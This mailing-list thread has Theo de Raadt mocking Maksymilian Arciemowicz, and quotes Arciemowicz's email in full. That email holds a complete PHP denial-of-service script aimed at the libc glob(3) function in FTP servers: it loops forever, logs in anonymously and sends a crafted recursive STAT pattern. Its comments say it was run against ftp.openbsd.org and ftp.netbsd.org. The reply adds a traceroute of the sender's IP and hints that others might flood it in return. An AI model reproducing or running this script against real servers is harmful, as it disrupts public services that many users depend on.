It's rather astonishing what attempts to passfor a credible security
advisory today.

"oh, I made a lot of connections to the site and they blocked me."

Thank you, Maksymillian, for showing us all that you can execute a
denial of service attack from 90.156.82.13.

I wonder how many connections his site supports to his services. perhaps some
similar "security expert" can test his connection rate and let us all know.

# traceroute  -n 90.156.82.13
traceroute to 90.156.82.13 (90.156.82.13), 64 hops max, 40 byte packets
 1  129.128.5.2  6.906 ms  0.818 ms  1.444 ms
 2  129.128.3.194  0.306 ms  0.303 ms  0.306 ms
 3  129.128.3.130  0.345 ms  0.502 ms  0.656 ms
 4  129.128.3.170  0.502 ms  0.726 ms  1.443 ms
 5  64.42.209.114  5.628 ms  5.562 ms  5.272 ms
 6  216.18.32.13  6.337 ms  5.676 ms  5.752 ms
 7  66.59.190.198  18.936 ms  19.18 ms  18.523 ms
 8  66.59.190.18  18.384 ms  18.659 ms  18.426 ms
 9  67.69.199.105  17.797 ms  17.785 ms  18.111 ms
10  64.86.115.13  17.369 ms  17.651 ms  17.175 ms
11  216.6.98.29  68.828 ms  69.162 ms  69.146 ms
12  216.6.57.9  87.943 ms  87.828 ms  87.879 ms
13  195.219.69.29  175.930 ms  176.47 ms  175.804 ms
14  195.219.69.2  189.366 ms  176.757 ms  179.460 ms
15  195.219.180.6  193.562 ms  197.755 ms  197.880 ms
16  195.219.246.2  181.461 ms  201.536 ms  179.635 ms
17  83.238.251.56  177.432 ms  177.971 ms  177.115 ms
18  83.238.250.38  189.741 ms  190.70 ms  189.646 ms
19  83.238.250.12  191.123 ms  193.99 ms  192.135 ms
20  83.238.251.41  189.843 ms  189.805 ms  189.245 ms
21  87.204.248.202  188.981 ms  189.167 ms  459.987 ms
22  87.99.33.90  190.739 ms  190.637 ms  190.955 ms
23  87.99.32.202  190.180 ms  190.271 ms  190.160 ms
24  90.156.82.13  289.39 ms  331.276 ms  319.419 ms
^C
# host 90.156.82.13
13.82.156.90.in-addr.arpa domain name pointer 90-156-82-13.magma-net.pl.
#




On 2 July 2010 15:47, Theo de Raadt <dera...@cvs.openbsd.org> wrote:
> OK, I am letting the maintainer of the site know, at the University Campus
> that you have just executed a denial of service against.
>
> I am surprised that you would go out of your way to declare so freely
> that you have purposely participated in a denial of service.
>
>> Return-Path: c...@securityreason.com
>> Delivery-Date: Fri Jul  2 15:38:24 2010
>> Received: from shear.ucar.edu (lists.openbsd.org [192.43.244.163])
>>       by cvs.openbsd.org (8.14.3/8.12.1) with ESMTP id o62LcNgR016472
>>       (version=TLSv1/SSLv3 cipher=DHE-DSS-AES256-SHA bits=256 verify=FAIL)
>>       for <dera...@cvs.openbsd.org>; Fri, 2 Jul 2010 15:38:24 -0600 (MDT)
>> Received: from v117864.home.net.pl (v117864.home.net.pl [89.161.252.8])
>>       by shear.ucar.edu (8.14.3/8.14.3) with SMTP id o62LcG20025931
>>       for <dera...@openbsd.org>; Fri, 2 Jul 2010 15:38:17 -0600 (MDT)
>> Received: from 90-156-82-13.magma-net.pl [90.156.82.13] (HELO [127.0.0.1])
>>  by securityreason.home.pl [89.161.252.8] with SMTP (IdeaSmtpServer v0.70)
>>  id a6e20078b871f388; Fri, 2 Jul 2010 22:38:15 +0200
>> Message-ID: <4c2e4e40.4080...@securityreason.com>
>> Date: Fri, 02 Jul 2010 22:38:24 +0200
>> From: Maksymilian Arciemowicz <c...@securityreason.com>
>> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.10)
Gecko/20100512 Thunderbird/3.0.5
>> MIME-Version: 1.0
>> To: dera...@openbsd.org, secur...@openbsd.org
>> Subject: libc/glob(3) DoS PoC for ftp.openbsd.org and ftp.netbsd.org
>> X-Enigmail-Version: 1.0.1
>> Content-Type: text/plain; charset=ISO-8859-1
>> Content-Transfer-Encoding: 7bit
>>
>> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA1
>>
>> <?php
>>
>> /* Libc/glob(3) denial-of-service
>> Maksymilian Arciemowicz from SecurityReason.com
>>
>> This script has been used to attack ftp.openbsd.org and ftp.netbsd.org
>>
>> Result (ftp.openbsd.org):
>> - - Connection refused
>>
>> and in the end
>>
>> # telnet ftp.openbsd.org 21
>> Trying 129.128.5.191...
>> Connected to ftp.openbsd.org.
>> Escape character is '^]'.
>> 421-  If you are seeing this message you have been blocked from using
>> 421- this ftp server - most likely for mirroring content without paying
>> 421- attention to what you were mirroring or where you should be mirroring
>> 421- it from, or for excessive connection rates.
>> 421- OpenBSD should *NOT* be mirrored from here, you should use
>> 421- a second level mirror as described in http://www.openbsd.org/ftp.html
>> 421
>>
>> Connection closed by foreign host.
>> #
>>
>> ;]
>>
>> Result (ftp.netbsd.org):
>> - - no more access for anonymous
>>
>> On 02.07.2010 20:29 CET, ftp.netbsd.org has return:
>> 530 User ftp access denied, connection limit of 160 reached.
>>
>>
>> Affter attack from one host
>>
>> */
>>
>> $conf['host']= $argv[1] ? $argv[1] : "HOST";
>> $conf['user'] =$argv[2] ? $argv[2] : "anonymous";
>> $conf['pass'] =$argv[3] ? $argv[3] : "m...@cxib.net";
>> $conf['port']= $argv[4] ? $argv[4] : 21;
>>
>> $dirnames=array('A', 'B', 'C', 'D',
>> 'E','F','G','H','I','J','K','M','N','O','P');
>>
$pathsent="{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{
..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*c
x";
>>
>> // fts_levelsumary
>> $fts_level=2;
>>
>> $created_directories=true;
>>
>> function attackglobinftp(){
>>       global $conf;
>>       global $dirnames;
>>       global $pathsent;
>>       global $fts_level;
>>       global $created_directories;
>>
>>       if (isset($conf['port']) and
>>       ($socket=socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) and
>>       (socket_connect($socket, $conf['host'], $conf['port']))){
>>
>>       echo "New connection opened\n";
>>       socket_write($socket,  "USER ".$conf['user']."\nPASS
".$conf['pass']."\n");
>>
>> if(!$created_directories)
>>       for($stagc=0;$stagc < count($dirnames);$stagc++){
>>               for($ssdc=2;$ssdc--;){
>>                       socket_write($socket, "MKD
".$dirnames[$stagc]."\nCWD
>> ".$dirnames[$stagc]."\n");
>>                       echo "MKD ".$dirnames[$stagc]."\nCWD
".$dirnames[$stagc]." for \n";
>>                       echo socket_read($socket,10204);
>>                       echo $ssdc."\n";
>>               }
>>               for($ssdc=256;$ssdc--;){
>>                       socket_write($socket, "cwd ..\n");
>>                       echo socket_read($socket,10000);
>>               }
>>       }
>>       $created_directories=true;
>>
>>
>>       for($aoi=1; $aoi--;
>>       ){
>>               socket_write($socket, "STAT ".$pathsent."\n");
>>               echo "sent: STAT ".$pathsent."s\n";
>>       }
>>       sleep(5);
>> } else
>>       echo "Unable to connect\n";
>>
>> }
>>
>> while(1)
>>       attackglobinftp();
>> ?>
>>
>>
>> - --
>> Best Regards,
>> - ------------------------
>> pub   1024D/A6986BD6 2008-08-22
>> uid                  Maksymilian Arciemowicz (cxib)
>> <c...@securityreason.com>
>> sub   4096g/0889FA9A 2008-08-22
>>
>> http://securityreason.com
>> http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
>> -----BEGIN PGP SIGNATURE-----
>>
>> iEYEARECAAYFAkwuTkAACgkQpiCeOKaYa9aafQCeNCpKgH3qFz0HscgNJ/JEunyS
>> I0EAnAxEcaMFSq4Kl0x3NSqzeuV1SP3p
>> =lx/r
>> -----END PGP SIGNATURE-----

Reply via email to